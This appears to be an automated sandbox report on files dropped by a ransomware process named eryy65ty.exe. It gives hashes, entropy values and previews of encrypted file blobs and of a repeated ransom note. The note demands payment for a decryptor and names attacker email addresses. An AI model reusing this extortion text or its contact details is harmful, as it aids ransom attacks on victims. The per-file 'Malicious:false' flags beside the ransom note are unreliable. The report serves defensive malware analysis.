                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.1541502559271075
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:O6zjoSfiPNdY7tmFahz6yUBjxFcOCMmVSnVYXVw/7C2y9SOFB6t6Sn:HvoVNcgaJiLCMEhVK7C2yBuQSn
                                                                                                    MD5:B75C815EDD8C0C69B4638897E6045885
                                                                                                    SHA1:654006CBF8265E406C2A9630B1EB9787472D74E7
                                                                                                    SHA-256:82E86B6FD592B08304AB386E5601E7E3D9FCCCD668EF4480DC263ACF4938A3CB
                                                                                                    SHA-512:F52286477C12AA5517FE81E6B3243EF084D50A9A0BE7DFA3816D3D7D10017267DCC5BF4770CEF369A58F95AF756556931C150220A2CFC9E0A117F98E1ACF0DDE
                                                                                                    Malicious:false
                                                                                                    Preview:..?..FJ.....2.............a..Z..3.9.krz....o4[...A6.D~dV...s.?M2...........u#c5k.n.h]^..'..o...#U..q..,'.k..^DQ...P...+v7.l`#q1] s..h...).KA...=..C.o[....QD..@.....V...*.L...3..!..qn..MC.Hi4=X....2/.CTvw..#p..B`U..dE.K.....]...q....y...[...c......{....v...ms..1....s.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):290
                                                                                                    Entropy (8bit):7.156724941915944
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:UC5frj+rzfqB1hpahOE3UrUT36JhA9MHf7Wdmn:UCx+rWB1rrsUUTqJhA2f7Wdmn
                                                                                                    MD5:F552334171A4CCF95BCEF7AE83D6A55A
                                                                                                    SHA1:10EC467574A44206FC8A6A0194BD5C4AC213E422
                                                                                                    SHA-256:ACF72D346A275AFAB6C571BF3177E2B3E1BCC43C88E8E91CB5BE2A99E25AAD7B
                                                                                                    SHA-512:7FFF51CEC83A3B398C4094ED126013D12D02EBE596C1441E8C042B32C9C2061714D54847B566EB34A3FED968B3C7488316AB5ABAFEA99EF61BAE48D9809BC04B
                                                                                                    Malicious:false
                                                                                                    Preview:...=C..8+.@...G....n....:..yt.e^..}.O...kY..a...gs.....V~.5.?.#..W|"N.e:..Be.S[Y..$.S...l..8.).J%..[,{...v....Q_..<{.#g.S'.p..l......- .~.kw....B..X.!...4.....P3+...j.%t......8.2.m.c!..%..x.......m.9...)..~.o...}i.[..iO.VV..e+.,..:....!n...x.....E.M.!A8.{.MV..K......0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):290
                                                                                                    Entropy (8bit):7.156724941915944
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:UC5frj+rzfqB1hpahOE3UrUT36JhA9MHf7Wdmn:UCx+rWB1rrsUUTqJhA2f7Wdmn
                                                                                                    MD5:F552334171A4CCF95BCEF7AE83D6A55A
                                                                                                    SHA1:10EC467574A44206FC8A6A0194BD5C4AC213E422
                                                                                                    SHA-256:ACF72D346A275AFAB6C571BF3177E2B3E1BCC43C88E8E91CB5BE2A99E25AAD7B
                                                                                                    SHA-512:7FFF51CEC83A3B398C4094ED126013D12D02EBE596C1441E8C042B32C9C2061714D54847B566EB34A3FED968B3C7488316AB5ABAFEA99EF61BAE48D9809BC04B
                                                                                                    Malicious:false
                                                                                                    Preview:...=C..8+.@...G....n....:..yt.e^..}.O...kY..a...gs.....V~.5.?.#..W|"N.e:..Be.S[Y..$.S...l..8.).J%..[,{...v....Q_..<{.#g.S'.p..l......- .~.kw....B..X.!...4.....P3+...j.%t......8.2.m.c!..%..x.......m.9...)..~.o...}i.[..iO.VV..e+.,..:....!n...x.....E.M.!A8.{.MV..K......0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):734
                                                                                                    Entropy (8bit):7.708035787857152
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Y3a7FTgZ1Bp+l9Nv/Q6VBidxzC3K17jjgPCj2hC+099b7XE1FEXJZd7U47q4YLZV:Ia7FTuBpanDgm3M7jjrCg+2DgENA4+4S
                                                                                                    MD5:A01527E162B7A67E5905BC8A14FDC9ED
                                                                                                    SHA1:A19D94B963BC6FF07D46DAAB9ECA16F7999AC479
                                                                                                    SHA-256:75148324769B6480438E4CBE94812259BAE02E6B6B8A2D03BF779F7629CB2E57
                                                                                                    SHA-512:6B771C72F5F877BE66957833AC39592DA6E2C1F6C8765A56BA7B5DD6F289C2EA90FB6258A0EEA8F267EBEBAC505649B3EAB874A04AFEF9D7AA890C7896C8F7B4
                                                                                                    Malicious:false
                                                                                                    Preview:..*..[..o.\,..B.1.8.....c..s6...U..>..`....|Z.DTA.?]..t.6m.&.&...fP.K58.a....uR.._EX<.....K..w..%%..'5..?X.+.3..d.O...s.(.........7..6..Zr8..t......Q.....e.]Q..k....2vo....@tR...2%.....Gw.j20.....2X...&0..58.e..+t...7BY~x.xp.xM..Yl!N.?A..;....&'I.5.1K..#......G.UAI.RQ..b..F..h..+........Hx....(..n.....o.n.H.$...]!.-.<a.L^b...'.*)y;........)..P2.l....v...-g.g.Y.O{y.....MtIXG. .....n<#N..(`.l..:. ...m}saJ..gK..@@.Tey./..)...b..HF. Q..7...tv...n^A..r..+Y FH...p.HJ#+..2.2....XHPV)...^.X..K0-}..U.0...".)j.....V..5".=.!~....Y.?.....Ojjyf..v...*...r..{.....L.-....hRZ.1......|C......y..."..d'...YY.a..).~l...H..v......56}L....TD.Q=.(.7..4.M...k;.P..4......-..rg..G....L..(..Q....xx.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):734
                                                                                                    Entropy (8bit):7.708035787857152
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:Y3a7FTgZ1Bp+l9Nv/Q6VBidxzC3K17jjgPCj2hC+099b7XE1FEXJZd7U47q4YLZV:Ia7FTuBpanDgm3M7jjrCg+2DgENA4+4S
                                                                                                    MD5:A01527E162B7A67E5905BC8A14FDC9ED
                                                                                                    SHA1:A19D94B963BC6FF07D46DAAB9ECA16F7999AC479
                                                                                                    SHA-256:75148324769B6480438E4CBE94812259BAE02E6B6B8A2D03BF779F7629CB2E57
                                                                                                    SHA-512:6B771C72F5F877BE66957833AC39592DA6E2C1F6C8765A56BA7B5DD6F289C2EA90FB6258A0EEA8F267EBEBAC505649B3EAB874A04AFEF9D7AA890C7896C8F7B4
                                                                                                    Malicious:false
                                                                                                    Preview:..*..[..o.\,..B.1.8.....c..s6...U..>..`....|Z.DTA.?]..t.6m.&.&...fP.K58.a....uR.._EX<.....K..w..%%..'5..?X.+.3..d.O...s.(.........7..6..Zr8..t......Q.....e.]Q..k....2vo....@tR...2%.....Gw.j20.....2X...&0..58.e..+t...7BY~x.xp.xM..Yl!N.?A..;....&'I.5.1K..#......G.UAI.RQ..b..F..h..+........Hx....(..n.....o.n.H.$...]!.-.<a.L^b...'.*)y;........)..P2.l....v...-g.g.Y.O{y.....MtIXG. .....n<#N..(`.l..:. ...m}saJ..gK..@@.Tey./..)...b..HF. Q..7...tv...n^A..r..+Y FH...p.HJ#+..2.2....XHPV)...^.X..K0-}..U.0...".)j.....V..5".=.!~....Y.?.....Ojjyf..v...*...r..{.....L.-....hRZ.1......|C......y..."..d'...YY.a..).~l...H..v......56}L....TD.Q=.(.7..4.M...k;.P..4......-..rg..G....L..(..Q....xx.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):290
                                                                                                    Entropy (8bit):7.2489035623154585
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:4bxkbTi5aW07/VuDNJe5EJxxdT94fZcmtlW1CXTwPnFSn:4bx7a7uN/Dxxafmnkn
                                                                                                    MD5:37EC38CC8B37B342405261690A6BD644
                                                                                                    SHA1:44FD61C58242C687A994009980EAA8F951065DDA
                                                                                                    SHA-256:0030EDF5591FBA864486946166B487FE190442A57FFFCF6627926161AF9B7298
                                                                                                    SHA-512:CE50E614D7D92103604D003CD9385E2FDC9F03E0EACDE8B5CBBB9C4E0B24AD0C9439936AC1AFF95513397174E136B11C287BE7283BAADCC30382B723F9146471
                                                                                                    Malicious:false
                                                                                                    Preview:..+..~.~...G.X....C.>....p..F...;q.....nw.+\.c.l.U./....?..[.{~.K.0R..zv.B+..3...A>.....Sg.H...z.Q.G{.......H....Cm.yrs...).1....F4....p...D..r...._$.t.....Og.(.........s..3..+.......CH1.UpF{R.:.m.D].L.....^..y23.2W..l......8".&8s.K,...z..`...`2......I<...*j..8dF...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):290
                                                                                                    Entropy (8bit):7.2489035623154585
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:4bxkbTi5aW07/VuDNJe5EJxxdT94fZcmtlW1CXTwPnFSn:4bx7a7uN/Dxxafmnkn
                                                                                                    MD5:37EC38CC8B37B342405261690A6BD644
                                                                                                    SHA1:44FD61C58242C687A994009980EAA8F951065DDA
                                                                                                    SHA-256:0030EDF5591FBA864486946166B487FE190442A57FFFCF6627926161AF9B7298
                                                                                                    SHA-512:CE50E614D7D92103604D003CD9385E2FDC9F03E0EACDE8B5CBBB9C4E0B24AD0C9439936AC1AFF95513397174E136B11C287BE7283BAADCC30382B723F9146471
                                                                                                    Malicious:false
                                                                                                    Preview:..+..~.~...G.X....C.>....p..F...;q.....nw.+\.c.l.U./....?..[.{~.K.0R..zv.B+..3...A>.....Sg.H...z.Q.G{.......H....Cm.yrs...).1....F4....p...D..r...._$.t.....Og.(.........s..3..+.......CH1.UpF{R.:.m.D].L.....^..y23.2W..l......8".&8s.K,...z..`...`2......I<...*j..8dF...0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):292
                                                                                                    Entropy (8bit):7.155575567826174
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kUzAvPDKwz9titv2QTMJ+z73qizMPJF7oJhmZDhdZAbZsSn:kUzcPDadlbz1oPJNo7U4fn
                                                                                                    MD5:480D0E323D9A3CA89C1560A1CD12DA31
                                                                                                    SHA1:6C15AD2C69DEE7495E406FC77071FAB1BCE4FC5B
                                                                                                    SHA-256:D63837114197796F7A1945E72A0DA020F0D22BED290BC97447E882F9C88B7808
                                                                                                    SHA-512:B9DA71AE8DE0CEEF73080906A6E8F3A1388B73BB80DE83BAFB61F49C4679B1E4F5EFE07CEC32F78A80A25614247908978F9ED0BBD12CE082443FAA38CD3076FE
                                                                                                    Malicious:false
                                                                                                    Preview:.Cb.{M.wT*M,&.."............X.....F(.....k.j.....<{.c|$.&4...lR.7....J6P1...39...o...a.n...U.S@M.u..E.l9.j...2.1H[1/..Z.!.&.+..@.f,9.C.)....M.m...}......\.!f..C.".Su...l.rA.d.......?2....1..>.P.U<x6,..1.......".&.K3!-j+..l...BI.......8.gC:.=.. V..%w.&.Q.P..h......(T.R.WM.0xABADCABA
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
                                                                                                    Preview:ATTENTION!....Don't worry, you can return your files! ..All your files like photos, videos and other important documents are encrypted with a strong encryption algorithm and unique key...The only method of recovering files is to purchase a decrypt tool and your key...Do not try to recover your files without a decrypt tool, you may damage them making them impossible to recover....we advise you contact us in less than 72 hours, otherwise there is a possibility that your files will never be returned...We will not wait for your letter for a long time, mail can be abused, we are moving on, hurry up with the decision.....Check your email 'Spam' or 'Junk' foeder if you don't get answer within 6 hours.....Contact us..email :edfr789@tutanota.com.. -> edfr789@tutamail.com..Attach this file in the email...ID :F78F1863323E95490AE92489C8E02518C74648535F178704204F5E9DFE97B742486FBA33CD24C4A63712BD2D89E72D4A7DA05B86139BC1B10797173A61FD652211153D409E07F9C7F21A43204824743265021B282447E114CE08D23585C
                                                                                                    Process:C:\Users\user\AppData\Local\Temp\eryy65ty.exe
                                                                                                    File Type:ASCII text, with very long lines (3354), with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):4165
                                                                                                    Entropy (8bit):4.7937259680287445
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:96:cvNlHaKqHidscvSYvVzlCPuVVmzOr1zVfVWeAKlxmrzw+19LQZnnQyaJz:Qn6FH4FSYvt3VVNf1AKPW94noz
                                                                                                    MD5:35D820B5FDA58F016DD2B981D94774E6
                                                                                                    SHA1:6A4293721CDD28A40EEDBA4494C5740FC35F0A35
                                                                                                    SHA-256:DD387FB83D77B016B7D12ED10C1789DF40A5ED3DF550CC077A99EC9A718ACCE5
                                                                                                    SHA-512:D6B3C70C763091115779F13552D51B17562F07CA0A49CB2ED6513DD2A09BD985301D34D36CBF4CEC407556A71D55A082485CA01CB75B1E84B23D8D1E850D5F7F
                                                                                                    Malicious:false
